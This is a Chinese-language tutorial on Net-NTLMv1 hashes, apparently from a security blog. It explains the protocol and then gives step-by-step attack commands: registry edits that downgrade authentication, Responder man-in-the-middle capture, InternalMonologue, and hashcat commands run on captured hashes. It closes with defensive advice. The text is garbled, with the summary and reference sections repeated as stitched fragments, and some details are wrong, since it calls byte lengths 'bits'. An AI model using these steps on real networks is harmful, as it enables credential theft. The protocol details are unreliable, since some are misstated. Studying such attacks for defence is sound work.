Windows下的密码hash——Net-NTLMv1详解<\/h1>

0x00 概述<\/h2>
Net-NTLMv1是Windows早期版本使用的认证协议，相比Net-NTLMv2在安全性上更为脆弱。本文详细介绍Net-NTLMv1的加密机制、破解方法和防御策略。<\/p>

0x01 Net-NTLMv1加密机制<\/h2>

认证流程<\/h3>

客户端向服务器发送请求<\/li>
服务器生成8位Challenge并返回客户端<\/li>
客户端使用用户密码hash加密Challenge，生成Response发送给服务器<\/li>

服务器验证Response<\/li> <\/ol>

与Net-NTLMv2的区别<\/h3>

Challenge长度：v1为8位，v2为16位<\/li>

加密算法：v1使用较弱的3DES加密<\/li> <\/ul>

Response计算方法<\/h3>

将用户NTLM hash分成三组，每组7比特（不足补0）<\/li>

使用这三组密钥对Server发来的Challenge进行3DES加密<\/li> <\/ol>

0x02 Net-NTLMv1破解方法<\/h2>

方法一：捕获数据包+字典破解<\/h3>

环境配置：<\/strong><\/p>

服务器：Server2008 x64 (192.168.62.144)<\/li>
客户端：Win7 x64 (192.168.62.137)<\/li>
测试账户：log1\/logtest123!<\/li> <\/ul>
步骤：<\/strong><\/p>

修改客户端注册表启用Net-NTLMv1：<\/p>
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ \/v lmcompatibilitylevel \/t REG_DWORD \/d 0 \/f <\/code><\/pre> <\/li> 客户端远程连接服务器：<\/p> net use \\192.168.62.144 \/u:log1 logtest123! <\/code><\/pre> <\/li> 使用Wireshark捕获数据包，获取关键信息：<\/p> Challenge：8d2da0f5e21e20ee<\/li> LM Response：fec9b082080e34ba00000000000000000000000000000000<\/li> NTLM Response：51acb9f9909f0e3c4254c332f5e302a38429c5490206bc04<\/li> Username：log1<\/li> Hostname：WIN-BH7SVRRDGVA<\/li> <\/ul> <\/li> 构造Hashcat输入格式：<\/p> username::hostname:LM response:NTLM response:challenge log1::WIN-BH7SVRRDGVA:fec9b082080e34ba00000000000000000000000000000000:51acb9f9909f0e3c4254c332f5e302a38429c5490206bc04:8d2da0f5e21e20ee <\/code><\/pre> <\/li> 使用Hashcat破解：<\/p> hashcat -m 5500 "log1::WIN-BH7SVRRDGVA:fec9b082080e34ba00000000000000000000000000000000:51acb9f9909f0e3c4254c332f5e302a38429c5490206bc04:8d2da0f5e21e20ee" \/tmp\/password.list -o found.txt --force <\/code><\/pre> <\/li> <\/ol> 方法二：中间人攻击+彩虹表破解<\/h3> 使用Responder等工具控制Challenge为固定值1122334455667788<\/li> 获取Net-NTLMv1 hash示例： a::WIN-BH7SVRRDGVA:aebc606d66e80ea649198ed339bda8cd7872c227d6baf33a:aebc606d66e80ea649198ed339bda8cd7872c227d6baf33a:1122334455667788 <\/code><\/pre> <\/li> 使用crack.sh在线破解：输入格式：NTHASH:aebc606d66e80ea649198ed339bda8cd7872c227d6baf33a<\/code><\/li> 通常在1分钟内可获取结果<\/li> <\/ul> <\/li> <\/ol> 0x03 利用工具InternalMonologue<\/h2> 功能特点<\/h3> 无需操作lsass.exe进程<\/li> 不与远程服务器交互，不产生网络流量<\/li> 不进行NTLM认证，不产生日志<\/li> <\/ul> 使用方法<\/h3> 修改注册表降级到Net-NTLMv1：<\/p> reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ \/v lmcompatibilitylevel \/t REG_DWORD \/d 2 \/f reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0\ \/v NtlmMinClientSec \/t REG_DWORD \/d 536870912 \/f reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0\ \/v RestrictSendingNTLMTraffic \/t REG_DWORD \/d 0 \/f <\/code><\/pre> <\/li> 运行InternalMonologue获取Net-NTLMv1响应<\/p> <\/li> 使用crack.sh破解获取的hash<\/p> <\/li> <\/ol> 普通用户权限下的利用<\/h3> 即使以普通用户权限运行，也能获取Net-NTLMv2数据包：<\/p> a::WIN-BH7SVRRDGVA:1122334455667788:db18ac502e829dfab120e78c041e2f87:01010000000000008e2ddebb92c2d30175f9bda99183337900000000020000000000000000000000 <\/code><\/pre> 使用Hashcat破解：<\/p> hashcat -m 5600 "a::WIN-BH7SVRRDGVA:1122334455667788:db18ac502e829dfab120e78c041e2f87:01010000000000008e2ddebb92c2d30175f9bda99183337900000000020000000000000000000000" \/tmp\/password.list --force <\/code><\/pre> 0x04 防御策略<\/h2> 保持系统默认设置<\/strong>：Windows Vista及以后版本默认使用Net-NTLMv2<\/li> 禁用Net-NTLMv1<\/strong>： reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ \/v lmcompatibilitylevel \/t REG_DWORD \/d 3 \/f <\/code><\/pre> <\/li> 使用强密码策略<\/strong>：增加字典破解难度<\/li> 监控注册表修改<\/strong>：特别是lmcompatibilitylevel等关键项的变更<\/li> <\/ol> 0x05 总结<\/h2> Net-NTLMv1由于其脆弱性，在现代Windows环境中已被Net-NTLMv2取代。了解其工作机制有助于更好地理解Windows认证机制和安全防御。防御方面应保持系统默认的Net-NTLMv2设置，并监控可能的降级攻击。<\/p> 参考资源<\/h2> NTLM认证协议详解<\/a><\/li> Hashcat参数说明<\/a><\/li> 在线破解服务<\/a><\/li> InternalMonologue工具<\/a><\/li> <\/ol>

Windows下的密码hash——Net-NTLMv1详解<\/h1>

0x00 概述<\/h2> Net-NTLMv1是Windows早期版本使用的认证协议，相比Net-NTLMv2在安全性上更为脆弱。本文详细介绍Net-NTLMv1的加密机制、破解方法和防御策略。<\/p>

0x01 Net-NTLMv1加密机制<\/h2>

0x02 Net-NTLMv1破解方法<\/h2>

0x03 利用工具InternalMonologue<\/h2>

0x05 总结<\/h2> Net-NTLMv1由于其脆弱性，在现代Windows环境中已被Net-NTLMv2取代。了解其工作机制有助于更好地理解Windows认证机制和安全防御。防御方面应保持系统默认的Net-NTLMv2设置，并监控可能的降级攻击。<\/p>

参考资源<\/h2> NTLM认证协议详解<\/a><\/li> Hashcat参数说明<\/a><\/li> 在线破解服务<\/a><\/li> InternalMonologue工具<\/a><\/li> <\/ol>

0x00 概述<\/h2>
Net-NTLMv1是Windows早期版本使用的认证协议，相比Net-NTLMv2在安全性上更为脆弱。本文详细介绍Net-NTLMv1的加密机制、破解方法和防御策略。<\/p>

0x05 总结<\/h2>
Net-NTLMv1由于其脆弱性，在现代Windows环境中已被Net-NTLMv2取代。了解其工作机制有助于更好地理解Windows认证机制和安全防御。防御方面应保持系统默认的Net-NTLMv2设置，并监控可能的降级攻击。<\/p>

参考资源<\/h2>

NTLM认证协议详解<\/a><\/li>
Hashcat参数说明<\/a><\/li>
在线破解服务<\/a><\/li>
InternalMonologue工具<\/a><\/li> <\/ol>